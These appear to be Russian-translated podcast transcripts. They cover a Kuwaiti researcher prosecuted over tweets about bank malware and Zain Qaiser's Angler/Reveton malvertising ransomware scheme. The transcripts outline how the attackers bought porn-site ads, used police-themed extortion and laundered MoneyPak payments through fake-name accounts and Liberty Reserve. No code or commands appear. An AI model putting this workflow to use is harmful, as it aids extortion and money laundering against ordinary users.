Ведущий: Что дало ему уверенность в том, что его посты в Твиттере в порядке. Он не называет банк, он старается не публиковать какую-либо конфиденциальную информацию, поэтому он разместил кучу материалов, которые он нашел, поговорил об этом с людьми, а затем как бы закрыл свое исследование этого и покончил с этим, перемещая на другие вещи. В конце концов, он не работал в банковском секторе, поэтому все, что он мог сделать, это просто предупредить других людей о том, что в Кувейте есть какое-то банковское вредоносное ПО, и, поскольку он это сделал, теперь он может сделать что-то еще. Ему больше нечего делать по этому поводу. Что ж, несколько дней спустя мы увидели твит из аккаунта Gulf Bank of Kuwait в Твиттере, в котором говорилось, что у них произошел сбой в обслуживании. В результате сбоя в обслуживании они потеряли 9 миллионов долларов.

МОХАММЕД: Да, 2,8 миллиона кувейтских динаров.

Ведущий Очень интересно, что Gulf Bank of Kuwait сообщил о проблеме.

МОХАММЕД: Да, я понял, что что-то определенно было не так, потому что это происходит не со всеми банками, понимаете, проблема в вашей транзакции с такими большими убытками, а затем банк публично говорит об этом. Так что, очевидно, что-то действительно было не так. Именно поэтому он привлек внимание страны. Мол, все в Кувейте говорили об этом. Что имел в виду Gulf Bank под этим заявлением?

Конечно, я собрал эти части воедино. Звучало так, как будто там была возможная связь.

Ведущий: Но да, он ничего публично не говорил о своих теориях, которые могли бы связать найденное им вредоносное ПО с Gulf Bank. Он просто смотрел, как об этом говорят в Твиттере, и заметил. Итак, Gulf Bank — четвертый по величине банк Кувейта. В то время они сами сообщали, что у них было 2,25 миллиарда долларов капитала, а потеря 9 миллионов долларов составила менее половины процента от их общего капитала. Но опять же, я хочу подчеркнуть здесь слово «потерять», а не «украсть» или «ограбить». Gulf Bank никогда не говорил, что деньги были украдены или что они были ограблены, только то, что произошел сбой в обслуживании, в результате которого они потеряли миллионы кувейтских динаров. Что ж, через несколько дней после этого следующая новость, которую мы получили из банка, заключалась в том, что они уволили своего генерального директора по информационным технологиям, не объяснив публично почему. Генеральный менеджер, похоже, был особенно удивлен этим и сказал, что было несправедливо, что они попросили его уйти. В банке происходило что-то важное, и они не скрывали, что именно. На следующей неделе Мохаммед отправляется на мероприятие по безопасности в Кувейте, чтобы пообщаться с другими людьми в области информационной безопасности. Но пока он общался на этом мероприятии, у него зазвонил телефон.

МОХАММЕД: Мне позвонил кто-то из отдела киберпреступности.

Ведущий: Они сказали ему, что существует вероятность того, что Gulf Bank собирается пожаловаться в полицию на его твиты, в которых говорится о вредоносном ПО, которое он нашел на VirusTotal, и они попросили его спуститься, чтобы они могли его допросить.

МОХАММЕД: Я был чрезвычайно осторожен в своих формулировках всех исследований, которые я проводил, чтобы не включать ничего, что явно связывало бы с определенной организацией или определенным банком, о котором я говорил. Без привязки их к определенному объекту по имени. Так что юридически я был чист. Итак, я пошел на допрос, и меня спросили: "Это ваши твиты?" Я говорю: "Да". "Вы имели в виду – Gulf Bank?" Я сказал: "Нет, я не упоминал их и не имел в виду их в своих твитах", и на этом допрос закончился.

Ведущий: Хорошо, может быть, это рутинная часть расследования, когда банк просто проявляет должную осмотрительность, отслеживая любые улики или версии об инциденте. Поскольку Мохаммед написал в Твиттере об обнаруженной им банковской вредоносной программе, возможно, это было нечто большее, поэтому полиция допрашивала его. Поговорив с ними, он почувствовал облегчение и подумал, ну вот, наверное, и конец.

МОХАММЕД: Именно тогда и произошли интересные вещи. Примерно в то же время мне пришлось отправиться в США в сопровождении жены, потому что она навещала свою мать, которая лечилась и была очень больна в Соединенных Штатах. Итак, я прилетел в США, и пока я был в США, мне позвонили, что мне нужно явиться на расследование прокуратуры.

Ведущий: Они хотели, чтобы он присутствовал при расследовании, потому что хотели задать ему дополнительные вопросы о том, что он знал об этом инциденте в банке «Галф». Знал ли он больше, чем то, о чем писал в Твиттере? Этот второй раунд допроса немного беспокоил его, но он знал, что невиновен, и хотел сотрудничать. Итак, он сказал им, что находится в США, помогает ухаживать за больным членом семьи, и он не может приехать в назначенную дату, но он будет рад приехать, как только вернется в Кувейт. Он даже показал им свой обратный билет на то, когда он вернется, и они сказали, что все в порядке, без проблем. Итак, он закончил свою поездку в США и вернулся в Кувейт, и отправился на переговоры со следователями. Но они сказали, что, поскольку он не явился в назначенную дату, ему теперь предъявляют обвинения.

МОХАММЕД: Поскольку государственное обвинение продолжало расследование, не дожидаясь моего приезда, я был расценен как воздерживающийся, так оно и было – меня обвинили, скажем, в обвинении кувейтского закона, что означает злоупотребление служебным положением. Дело в том, что кувейтский закон был, скажем так, сформулирован, и я разглашал коммерческую тайну истца.

Ведущий: Что? Твиты Мохаммеда привели к тому, что его обвинили в злоупотреблении мобильным телефоном и разглашении коммерческой тайны? Что-то явно пошло не так.

МОХАММЕД: Я волновался, но ничего не мог с этим поделать. Так что единственное, что я мог сделать, это подготовить надежную защиту.

Ведущий: Итак, он нанимает адвоката, чтобы убедиться, что он правильно расследует это уголовное обвинение. Когда крупный банк выдвигает против вас обвинения и сообщает, что потерял 9 миллионов долларов, вы должны относиться к этому очень серьезно, даже если вы совершенно невиновны. Итак, он был очень осторожен, и часть его задавалась вопросом, насколько это связано со взломом и насколько это связано с нарушением законов о свободе слова в Кувейте?

МОХАММЕД: Итак, я на самом деле не юрист, но в целом конституция Кувейта дает большую свободу слова, но потом говорит, что в соответствии с законами. Затем законы уточняют общие меры защиты конституции. Итак, у нас есть законы о киберпреступлениях, у нас есть законы о печати, у нас есть законы о СМИ, например: видео, телевидение, радио. У нас также есть законы о государственной безопасности. Все эти законы способствуют, скажем так, дальнейшему ограничению свободы слова. Так вот, в Кувейте есть общественные деятели, о которых нельзя, скажем, например, говорить в каком-то, скажем так, дурном тоне независимо от вашего намерения. Есть ограничения на то, что вы можете говорить.

Вы не можете, например, использовать язык ненависти против религиозных или политических меньшинств. Итак, речь идет о политических аспектах, религиозных аспектах или ограничениях свободы слова, а также о киберпреступности. Закон о киберпреступности был на самом деле интересным, потому что он вышел в 2014 году и должен был касаться киберпреступлений или преступлений, связанных с кибербезопасностью, таких как, например, взлом или мошенничество. Но потом адвокаты стали злоупотреблять этим, люди фактически обвиняли любого, кто плохо отзывался о вас. Итак, если вы были государственным чиновником, если вы были фигурой в социальных сетях, и кто-то пытался говорить о вас так, как вам не нравится, вы можете пойти и попытаться подать на них в суд в соответствии с этим законом. Много раз это приводило к приговорам, по которым люди должны были платить штрафы. Я думаю, что мой случай был примером этого, потому что я на самом деле не делал ничего плохого.

Ведущий: Интересно. Таким образом, похоже, что если кто-то говорит что-то, что наносит ущерб вашей компании или вам, вы можете подать на него в суд и, возможно, заставить его заплатить штраф за то, что он сказал. Итак, Мохаммед еще несколько раз очень внимательно перечитал свои твиты, пытаясь выяснить, сказал ли он что-нибудь негативное в адрес Gulf Bank. Но он вообще даже не упомянул в своих твитах Gulf Bank, поэтому был уверен, что не сделал ничего плохого. Однако он упомянул слово GBKADMIN. Подождите минуту: GBK. Означает ли это, что Gulf Bank of Kuwait? Ха. Даже если бы это было так, он не знал этого в то время. Дата судебного разбирательства была назначена на июль 2019 года. Теперь, через месяц после даты судебного разбирательства, в августе в США должна была состояться акция Black Hat, и Мохаммед должен был провести занятие на этой конференции. Итак, он хотел завершить это испытание, чтобы поехать в США. Он идет в суд в июле. Там был только прокурор. Юрист банка даже не появился. Мохаммед обдумывал со своим адвокатом, что сказать.

МОХАММЕД: Тогда мы обеспечили действительно надежную защиту. Мы, скажем так, обсудили этот аспект, что в первую очередь это уже защищенная речь. Во-вторых, в нем не упоминался ни один банк по имени, не упоминался конкретно какой-либо товарный знак банка, и тот факт, что это абсолютно не секрет, потому что банк уже обсуждал, что возникла проблема: в их системе есть проблема, которая привела к потере миллионов долларов. Так что не было секретом, что в банке уже происходит что-то неладное. Вдобавок ко всему, между мной и банком не было никакого договорного соглашения, которое привело бы к тому, что я делился бы какой-либо тайной между мной и ими. Так что, думаю, наткнулся бы, скажем, из открытых источников, которые, конечно, не считаются секретами.

Ведущий: Судья выглядел убежденным и, похоже, был на его стороне, поэтому он готовился к полету в Лас-Вегас, чтобы посетить Black Hat. Сначала ему пришлось лететь в Нью-Йорк, а затем в Вегас.

МОХАММЕД: В ночь перед отлетом в Нью-Йорк я получил странный зашифрованный телефонный звонок и телеграмму. Но затем, когда я ответил, это был кто-то очень подозрительный. Он пытался как бы спросить об инциденте, который произошел в банке, а затем он попытался сказать, что у меня есть некоторая информация о взломе, который произошел в этом банке, — пытался дернуть меня за ниточку. Я чувствовал, что кто-то пытается втянуть меня в обсуждение этого инцидента, пытается найти, пытается заманить в ловушку. Итак, я понял, что это либо кто-то совершенно сумасшедший, либо я действительно был бы сумасшедшим, если бы не подумал, что это была чья-то попытка заманить в ловушку. Кто? Я не знаю. Кто бы попытался это сделать? Я понятия не имею, кому это было бы выгодно. Однако я вел себя хладнокровно, сказал им, что это юридический вопрос: это должно быть доставлено в правовые органы, бла, бла, бла. Затем я повесил трубку. Что было действительно подозрительным для меня, так это то, почему кто-то пытается нацелиться на меня, пытается заманить меня в ловушку таким образом? Я действительно разозлил некоторых влиятельных людей? Был ли этот твит настолько, скажем, сильным против того, кто его скомпрометировал? Неужели на банк действительно оказали давление люди, связавшие мой твит с инцидентом в банке? Я до сих пор не знаю, кто этот человек, но, конечно, как я уже говорил, было бы безумием не думать, что это была какая-то связанная с этим попытка заманивания в ловушку.

Ведущий: Это было странно, и это снова разожгло его беспокойство по поводу этого дела, но он все же поехал в США. Находясь в Вегасе, его адвокат связался с ним и сказал, что у судьи есть вердикт по делу.

МОХАММЕД: В конце концов судьям стало ясно, что это абсолютно не нарушало никаких законов Кувейта.

Ведущий: Итак, с него сняли все обвинения, и это отличная новость, пока ты в Вегасе, верно? Мохаммед сказал мне, что он не посещал там вечеринки, потому что был так сосредоточен на обучении и просто хотел вернуться в Кувейт, как только оно закончится. Итак, когда он вернулся в Кувейт, он связался со своим адвокатом, и все, казалось, было спокойно. Все было хорошо, и он был рад, что это позади. Это был август. Затем приходит сентябрь, а затем, в октябре, он получает еще одно сообщение.

МОХАММЕД: Да, адвокат присылает мне по WhatsApp сообщение о том, что они подали апелляцию.

Ведущий: Прокуроры хотели продолжить расследование. Его адвокат объясняет, что это всего лишь вопрос формальностей. Если прокуратура подаст его в апелляционный суд, а он все равно будет признан невиновным, то они могут сказать, что исчерпали все варианты в этом деле и могут оставить его в покое. Это создает впечатление, что прокуратура действительно усердно работала над раскрытием этого дела, и, поскольку это была всего лишь формальность, на него не было ни новых улик, ни каких-либо новых обвинений. Но Мухаммед все еще беспокоился об этом. Я имею в виду, по крайней мере, ему приходится тратить все эти деньги на судебные издержки, чтобы помочь ему. Апелляционный суд занял больше года, потому что коронавирус продолжал задерживать суды. Ожидание суда всегда нервирует, независимо от того, насколько вы уверены, что ни в чем не виноваты. Но, наконец, настала дата суда, и судья рассмотрел его дело.

МОХАММЕД: Меня сразу оправдали.

Ведущий: Мохаммед вздохнул с облегчением. Это означало, что все наконец закончилось. Да, с тех пор, два года спустя, все еще позади. Звонков из полиции по этому поводу больше не поступало. Но к чему это привело, если вы нашли вредоносное ПО на VirusTotal и написали в Твиттере о том, что вы нашли. Так вот, в то время по всему миру происходила большая волна ограблений банков. Кто-то ходил вокруг, обычно рассылая фишинговые электронные письма банковским служащим, взламывая банк, а затем нацеливая сеть SWIFT, чтобы украсть миллионы долларов из банков. Многие из них работали. Организация Объединенных Наций расследовала это и опубликовала отчет, в котором говорится, что правительство Северной Кореи несет ответственность за ограбление банков в Бангладеш, Чили, Коста-Рике, Гамбии, Гватемале, Индии, Либерии, Малайзии, Мальте, Нигерии, Польше, Республика Корея, Словения, Южная Африка, Тунис, Вьетнам и Кувейт.

Прямо здесь, черным по белому, в отчете ООН о расследовании говорится, что в марте 2019 года правительство Северной Кореи ограбило банк в Кувейте. Это точно тот же месяц и год, когда Gulf Bank объявил о сбое в обслуживании и потерял 9 миллионов долларов. В этом отчете ООН не говорится, какой банк в Кувейте был ограблен, но говорится, что украденная сумма составила 49 миллионов долларов. Итак, это большое несоответствие цифр, что означает, что либо Gulf Bank не был ограблен, но действительно произошел какой-то странный сбой, из-за которого они потеряли миллионы долларов, что означает, что совершенно другой банк был ограблен в том же месяце и году в Кувейте, или Gulf Bank of Kuwait не сказал правды, заявив, что это был сбой в обслуживании, когда на самом деле это было ограбление, заявив, что это 9 миллионов долларов, когда на самом деле это было 49 миллионов долларов. Мы не знаем правды в этой истории.

МОХАММЕД: Ага. Таким образом, существует разница между твитом Gulf Bank и тем банком, на который пытался намекнуть отчет ООН. Итак, либо он нацелен на другой банк, либо, может быть, в этой истории есть нечто большее, чем то, что было опубликовано в открытых источниках.

Ведущий: Большое спасибо Мохаммеду Альдубу. Вы можете найти его в Твиттере: его зовут @Voulnet.

Эпизод 25: Как работают вымогатели

Вступить в наш чат

Программы-вымогатели ужасны. Они заражают вашу машину и блокируют все данные, а чтобы разблокировать, вы должны заплатить. В этом эпизоде мы углубимся в эту тему.

https://i.gyazo.com/a30c78a9407e8dc93134d5d9b7275ca8.png

Ведущий: Это история о парне по имени Зейн Кайзер. Это был 2011 год. Зейну было семнадцать лет, и он жил со своими родителями в Баркинге, что в Восточном Лондоне, Великобритания. В то время он изучал информатику в Городском университете, который находится прямо в центре Лондона. Большую часть времени он проводил за своим MacBook Pro. Городской университет был одним из первых в Великобритании, предложивших курсы компьютерных наук. Более того, у них один из самых высоких показателей трудоустройства выпускников. Те, кто заканчивает курсы, получают хорошую работу в информационной безопасности и делают успешную карьеру. Зейн не закончит свои курсы, не закончит учебу и не сделает блестящую карьеру. В темных частях Интернета существует целая секретная экономика вредоносных программ. Вы можете нанять хакера или купить эксплойты, вы можете заплатить за использование ботнета или вы можете покупать и продавать украденные у людей данные. Онлайн-преступники сегодня часто являются лишь одним звеном в цепочке поставок.

Один набор эксплойтов, найденный в даркнете, называется Angler. Некоторые очень умные хакеры сделали это. Мы думаем, что это, вероятно, было сделано в России. Вот как это работает: он начинает с того, что каким-то образом заставляет вас посетить вредоносный веб-сайт. Теперь веб-сайты, которые вы можете посетить, могут многое рассказать о вашем компьютере. Они могут проверить, какая у вас версия Flash или Java, и если вы зайдете на веб-сайт, на котором запущен Angler Exploit Kit, он сделает именно это. Он проверит, какие версии программного обеспечения вы используете. В основном он сканирует ваш компьютер на наличие устаревшего программного обеспечения. Он проверит вашу версию Adobe PDF Reader, затем версию Silverlight, затем версию Java, а затем версию Flash. Если он видит, что какой-либо из них устарел и имеет известную уязвимость, он переходит ко второму шагу. Он попытается воспользоваться этой уязвимостью и получить доступ к вашему компьютеру.

Давайте погрузимся в это на секунду. Одна из уязвимостей, которую будет использовать Angler Exploit Kit, называется уязвимостью Use After Free. Это где у программы были какие-то данные в памяти, но она покончила с ними и освободила их, но где-то в программе все еще есть ссылка на эту часть памяти. Хорошо, предположим, вы ели попкорн с другом и смотрели фильм. У вас на коленях чашка с попкорном, и вы делитесь ею с ними. Он берёт горсть, потом ты берешь горсть, потом он берёт горсть, потом ты берешь последнюю горсть. Попкорн закончился. Чашка пуста, но ваш друг не знает об этом. Он все еще думает, что в тарелке есть попкорн, поэтому вы играете с ним небольшую шутку и вместо этого кладете чашку спагетти себе на колени. Когда он идёт к чашке с попкорном, он засовывают руку в чашку со спагетти. Примерно так выглядят уязвимости Use After Free.

Ваш друг был запрограммирован лезть в чашку с попкорном, думая, что там что-то есть, но там ничего не было. В мире программного обеспечения вы можете поместить некоторые команды в эту чашу, чтобы, когда программа потянулась к ней, она выполнила те команды, которые вы ему сказали. Типа гениально, да? Ладно, хватит плохих аналогий. Angler — это набор эксплойтов, то есть он не просто содержит один эксплойт, а вместо этого ищет на вашем компьютере любой эксплойт, который он может использовать. У него могут быть десятки возможных эксплойтов, и если он их находит, то запускает на вашем компьютере команды, которые он не должен выполнять. На этом Англер как бы останавливается. Его задача на самом деле просто войти и выполнить полезную нагрузку. Однако полезной нагрузкой может быть что угодно; это может быть кража пользовательских данных или паролей, это может быть привязка вашего компьютера к ботнету, или это может быть просто удаление всего на компьютере.

Короче говоря, если на вашем компьютере установлено устаревшее программное обеспечение и вы посещаете веб-сайт с установленным набором эксплойтов Angler для уничтожения вашего компьютера, ваш компьютер будет заражен за считанные секунды и начнет удалять файлы. Страшные вещи. Однако семнадцатилетний Зейн Кайзер подумал, что это круто, и подумал, что это может принести ему немного денег. Проблема заключалась в том, что в то время программное обеспечение Angler было трудно достать. В начале 2012 года Зейн был очень активен в чатах и на форумах, используя свое имя пользователя K!NG, но с восклицательным знаком перед буквой «i». У него была идея, и он хочет воплотить свой план в жизнь. Зейн связывается с русскими создателями Angler и говорит им, что у него есть навыки и опыт, чтобы заработать им много денег. Вы предоставляете вредоносное ПО, сказал он, и я заражу им множество компьютеров.

https://i.gyazo.com/eb6771db75330d5ee57b6bc35b413e8a.png

ейн говорит им, что у него есть опыт в социальной инженерии и что он умеет манипулировать людьми, чтобы получить то, что он хочет, и у него нет проблем с этим. Он носитель английского языка и знает, как работает индустрия онлайн-рекламы. Зейн предложил разделить прибыль. Это была партнерская подача, и один из россиян был готов выслушать эту подачу. Соглашение было заключено. Зейн приступил к реализации своего плана. У него есть набор Angler Exploit Kit, который хорош для проникновения в компьютер жертвы, но это все, для чего он годен. Вам все еще нужна полезная нагрузка или действие после того, как машина эксплуатируется. Зейн решил вооружить Англера Реветоном. Reveton — мощная программа-вымогатель, которая шифрует весь жесткий диск пользователя с помощью пароля. Затем вы должны заплатить деньги, чтобы получить этот пароль для его расшифровки. Это идеально сработало для Зейна. Теперь у него есть набор эксплойтов для использования в качестве оружия, который установлен на веб-сайте и ждет, пока кто-нибудь посетит его, чтобы заразиться.Но как заставить кого-то зайти на ваш сайт, чтобы заразиться? Его идея заключалась в том, чтобы покупать онлайн-рекламу, которая указывала бы людям на его вредоносный веб-сайт. Где бы он купил эту рекламу? На порносайтах. Русские предоставили ему поддельные удостоверения личности, документы и учетные данные, чтобы он мог убедить законные рекламные агентства в том, что он обычный рекламщик. Это типичный пример вредоносной рекламы. Как только люди нажимают на эту ссылку, они перенаправляются на вредоносный веб-сайт, и компьютер будет заражен той программой-вымогателем Reveton, которую Зейн установил в Angler. Теперь, если вы собираетесь требовать выкуп, вам нужно иметь что-то, за что ваша жертва готова заплатить. Конечно, если вы заблокируете чей-то компьютер и скажете, что заплатите мне, чтобы разблокировать его, это может сработать, но план Зейна был немного более дьявольским.

Вымогатель Reveton иногда называют полицейским вирусом, потому что, когда вы заражаетесь им, он показывает вам логотип полиции и сообщает, что жертва нарушила закон, посетив этот порносайт. Компьютер не только зависает, но на экране внезапно появляются слова «порно», «детское порно», «ФБР» и «уголовные обвинения». Ну, вы поняли. Для Zain, нацеленного на людей, посещающих порносайты, чтобы попытаться заставить их нажать на это объявление, чтобы они могли быть заражены вредоносным ПО, было идеальное совпадение с этой программой-вымогателем. Это своего рода блестящая комбинация социальной инженерии и хакерства. Жертвы этого были бы не только в бешенстве, но и в смущении, стыде и даже страхе. Если вы заразите компьютер вашей семьи или рабочий компьютер, господи, какой беспорядок будет объяснять, что вы были на порносайте, когда заразились. Зейн безжалостно преследовал этих людей, и вскоре с его платной рекламой жесткие диски начали заражаться этой вредоносной программой.

На экране Зейна с требованием выкупа даже говорилось, что IP-адрес жертвы был передан в полицию. Но чтобы все это исчезло, все, что вам нужно сделать, это заплатить 200 долларов, и все исчезнет. Люди начали расплачиваться. Летом 2012 года, заключив соглашение с российской преступной группировкой, Зейн начал свою первую стадию, которая впоследствии превратилась в колоссальную аферу с программами-вымогателями. В Интернете почти нет веб-сайта, на котором не отображается какая-либо реклама. Рекламное место на популярных сайтах с большим трафиком пользуется спросом, и рекламодатели будут платить хорошие деньги, чтобы получить это рекламное место. Проблема возникает, когда размещенное объявление находится прямо перед вредоносным ПО, тайно встроенным в его код. Некоторые известные веб-сайты, такие как New York Times и The Atlantic, пострадали от вредоносной рекламы. Эти веб-сайты имеют высокий трафик, и они ничего не знали об этих мошенничествах, которые происходили. Зейн был полностью осведомлен о вредоносной рекламе, вредоносной рекламе, и понимал, как ее реализовать.

Он действовал как законный рекламодатель, стремящийся приобрести рекламное место на некоторых из крупнейших порнографических сайтов в мире. Принимал участие в торгах премиум-площадок в режиме реального времени; постоянно меняющийся рынок, и процесс торгов является конкурентным. По сути, платя за рекламу, он покупал трафик на свой сайт, а платный трафик приносил быстрые результаты. Настройте его, и вы сразу увидите больше посетителей и кликов. Все, что требовалось Зейну, — это щелкнуть по рекламе, и дело пошло. Это знание отчасти было причиной того, что Заин заинтересовал российскую преступную группировку. С их навыками программирования и его пониманием рекламного рынка они были уверены. Рекламная компания, с которой работал Зейн, ничего не знала о его истинных намерениях. Зейн добавил в свою рекламу перенаправления на веб-сайты, зараженные вредоносным ПО, набором эксплойтов Angler. Пользователи не знали об этом, но как только их браузер заходил на этот сайт, Angler сканировал их систему в поисках способа заразить ее.

Набор Angler Exploit Kit похож на собаку-ищейку, пытающуюся найти свою цель. Вы можете спросить, почему антивирус не останавливает это? Ну, во-первых, многие люди не используют антивирус, поэтому они как сидячие утки, особенно если они не обновляют свое программное обеспечение. Вот почему я говорю вам всегда обновлять свое программное обеспечение. Но, во-вторых, создатели Angler были очень умны, чтобы избежать его обнаружения. Он будет постоянно менять домены и IP-адреса, чтобы избежать попадания в черный список, и будет шифровать весь трафик, чтобы антивирус не обнаруживал вредоносные команды. Это изменило бы его внешний вид, чтобы избежать обнаружения совпадающих строк, которые может искать антивирус. Это мошенник вредоносного ПО.

Angler даже не нуждался в собственных файлах для запуска атаки. Ему даже не потребовалось время на машине, прежде чем она могла работать. Он может обнаружить уязвимость, отправить команды для ее использования, а затем выполнить все необходимые действия. Вдобавок ко всему, у российских кодеров, которые его сделали, тоже была уязвимость нулевого дня, уязвимость в Adobe Flash, о которой Adobe даже не знала. Это было скрытно, хитро и очень эффективно. Программа-вымогатель, которую предпочитали Зейн и эта русская группа, называлась Reveton. Его называют полицейским вирусом или даже вирусом ФБР, поскольку он выдает себя за официальное уведомление полиции.

РЕПОРТЕР: Внимание всем, у кого есть компьютер. Новый вирус не только заражает ваш компьютер, но и мошенники, стоящие за ним, также вымогают деньги. Он называется вирусом ФБР, но к полиции не имеет никакого отношения.

Ведущий: Это программа-вымогатель с элементами социальной инженерии. Это психологический трюк, тактика запугивания. Компьютер завис и отображал логотип ФБР. Он показал сообщение: «Вы нарушили закон. Вам грозит тюремное заключение. Мы зафиксировали изображения на этом сайте для взрослых с помощью вашей веб-камеры. Это уведомление заблокировало и заморозило ваш компьютер, когда вы просматриваете порнографический сайт». Смущение, стыд, страх разоблачения. Все эмоции, на которые рассчитывала эта вредоносная программа, побуждали пользователей следовать ее инструкциям и платить деньги за то, чтобы все это исчезло. В программе-вымогателе даже говорилось, что интернет-провайдер жертвы был уведомлен отделом киберпреступлений. Он даже сообщает их IP-адрес, имя хоста и говорит: «На вашем компьютере был обнаружен незаконно загруженный материал, который нарушает некоторые законы об авторском праве».

https://i.gyazo.com/1fb7f339d5c0e5f44bf99b51b13f04fc.png

Все это звучит и выглядит официально, а затем сообщает, что пользователю грозит штраф в размере 200 000 долларов США или тюремное заключение на срок до трех лет. Конечно, если вы хотите избежать этого, все, что вам нужно заплатить, это 200 долларов, и ваш компьютер будет разблокирован, а все уголовные дела против вас будут прекращены. Это не требует слишком много денег в качестве выкупа, ровно столько, чтобы его стоило делать, но не слишком много, чтобы люди не захотели или не смогли за него заплатить. В то время существовал Биткойн, криптовалюта, но это было только в 2012 году, так что прошло всего несколько лет с момента создания Биткойна. Хотя биткойн еще не был достаточно популярен, а цены сильно колебались, люди просто не были достаточно технически подкованными, чтобы понять, как купить биткойн и отправить его, поэтому решением стали предоплаченные карты GreenDot MoneyPak. Они не связаны с банковским счетом, и каждая карта имеет уникальный четырнадцатизначный номер.

Сколько же денег удалось заработать Зейну и получил ли он наказание? Узнаем в следующем выпуске.

Эпизод 26: Как хакеры наживаются на любителях порно

Вступить в наш чат

В то время это был идеальный способ для анонимных интернет-преступников получать деньги от своих жертв. Reveton давал информацию о пользователе, инструкции о том, как забрать деньги. Шаг первый, возьмите наличные в одном из этих торговых точек. Шаг второй: возьмите MoneyPak и купите его за наличные. Шаг третий, вернитесь и введите код MoneyPak в раздел кода на этом экране сообщения, а затем нажмите «Отправить». Это так просто.

Платная реклама Зейна, направлявшая трафик на его сайт, работала. Люди блокировали свои компьютеры и платили за то, чтобы их разблокировали. Деньги начали поступать для Зейна. Следующей задачей было получить наличные и убедиться, что его российские партнеры получат свою долю. Преступнику не так просто перевезти много денег и не быть пойманным полицией. Зейн собирал деньги, а затем через Liberty Reserve переводил их своим российским партнерам, но для этого ему требовалась помощь. Liberty Reserve был чем-то вроде теневого кузена ******. Это паршивая овца семейства цифровых валют, которую предпочитают многие киберпреступники. Учетная запись в Liberty Reserve не запрашивает у вас ваши настоящие учетные данные, доказательства, личность или что-либо еще для перевода денег. На самом деле, у него даже не было полной лицензии на деятельность по переводу денежных средств, что позже выдало его основателя.

https://i.gyazo.com/8d61757871b86a7707b19dc48ee8660f.png

Кто-то, кто хотел быстро отмыть деньги, в частном порядке и в Интернете, знал, что это идеальная схема. Зейн был распространителем вредоносного ПО и этой аферы с выкупом, но для отмывания средств и получения доступа к деньгам ему нужен был посредник. Тут-то и появился Рэймонд. Он из Мэйпл-Вэлли в Вашингтоне. В 2012 году ему исполнилось тридцать пять лет. Он был студентом Международного университета Флориды, и его роль заключалась в том, чтобы обналичивать платежи программ-вымогателей с карт MoneyPak, а затем конвертировать наличные деньги в Liberty Reserve, переводить деньги Зейну и оставь немного себе. Эти двое довольно быстро наладили свой распорядок дня. Зейн открывает несколько счетов и предоплаченных карт, используя фальшивые документы, предоставленные его контактным лицом в России, и передает эти счета Рэймонду.

Рэймонд использует коды MoneyPak для каждой выплаты выкупа. Он входит в свою учетную запись MoneyPak, использует коды для перевода выкупа на мошеннические счета. Теперь существуют ограничения на количество транзакций и суммы денег, которые можно внести через MoneyPak. Депозиты до 1000 долларов в течение суток, по-видимому, были стандартной нормой. Рэймонд, скорее всего, имел несколько учетных записей MoneyPak, все на вымышленные имена, чтобы он мог избежать превышения этих лимитов. После того, как он перевел деньги на счета, которые дал ему Зейн, он мог пойти и снять деньги в нескольких банкоматах в разных местах. Затем он отправлял его Зейну через Liberty Reserve. Чтобы открыть счет в Liberty Reserve, нужно было указать имя и адрес электронной почты. Вам нужно конвертировать наличные деньги, полученные преступным путем, чтобы купить то, что они называют долларами Liberty Reserve, за наличные.

Это превращает ваш выкуп наличными в цифровую валюту за комиссию около 5%. Чтобы купить доллары Либерти, Рэймонду пришлось пройти через обменник, который находился в совершенно другой стране и мог купить доллары Либерти оптом. У самой Liberty Reserve не было идентификационных данных людей, у которых там были счета. У них было только то имя и адрес электронной почты, которые использовались для открытия счета. Все переводы из наличных в Liberty Reserve и долларов Liberty обратно в наличные осуществлялись через эти биржи посредников и технически полностью вне самой Liberty Reserve. Все это сложный и технический способ просто получить чистые деньги, не имеющие криминального следа, но он работал и на Зейна, и на Рэймонда, и на русских кодеров. Зейн, вернувшись в Лондон, получил около 70% выкупа. Это была его доля от этой операции. Вполне нормально.

В этот момент деньги текли рекой, и чем больше рекламы он покупал на этих порносайтах, тем больше трафика он получал на свои веб-сайты, что приводило к большему количеству людей, пораженных программами-вымогателями, что означало, что больше людей платили. удалить его. По сути, он обменивал никель на десять центов. План работал. Он все еще был студентом университета, жил дома с родителями. У него не было оплачиваемой работы. У него не было никакого законного дохода, но он тратил много денег, которые зарабатывал на этих аферах. Он купил часы за 5000 британских фунтов. Он останавливался в шикарных отелях и тусовался с проститутками. Он много употреблял ********* и играл в азартные игры. Сообщалось, что он потратил 70 000 фунтов стерлингов в одном лондонском казино в течение десяти месяцев. Интересно, что он говорил своим друзьям и семье, откуда у него все эти деньги.

Но вся цепочка поставок вредоносного ПО как бизнеса меня восхищает. У вас есть одна команда, работающая над созданием эксплойта Angler, и они вооружают ее программой-вымогателем Reveton, созданной совершенно другой группой людей, а затем Зейн развертывает ее по всему миру, чтобы заразить как можно больше людей. он мог бы. Затем, когда приходят деньги, Рэймонд во Флориде отмывает их и отправляет обратно Зейну. Впечатляет, как много здесь должно произойти, чтобы эта операция заработала. Примерно в это же время полиция Испании начала получать сотни жалоб на вирусы-вымогатели. Куча других людей также расследовали это. Подразделение Trend Micro eCrimes, Европейский центр киберпреступности при Европоле, испанская полиция и Интерпол координировали свои действия, чтобы помочь друг другу выяснить, кто стоит за этим.

Этот обмен информацией позволил им составить довольно четкое представление о том, как была структурирована сеть банды, в том числе о том, как они перенаправляли трафик и настраивали свои серверы управления и контроля. Под кодовым названием «Операция «Выкуп» 27-летний россиянин был арестован в декабре 2012 года во время отдыха, по всей видимости, в Дубае. Но выяснилось, что он был главой испанской банды. Несколько месяцев спустя еще десять человек были арестованы во время шести рейдов в Малаге, Испания. Но эта группа не была той, с которой был связан Зейн; это была группа, ответственная за создание программы-вымогателя Reveton. Полиция выследила их, разрушила всю их операцию. Задержаны семеро россиян, двое грузин и двое украинцев. Полиции удалось изъять много компьютеров и оборудования, а также кредитных карт, которые использовались во всех этих атаках программ-вымогателей и для отмывания денег. Полиция полагала, что эта банда собирала более 1 000 000 евро в год. Только в Испании с мая 2011 года было зарегистрировано более 1200 случаев мошенничества с программами-вымогателями.

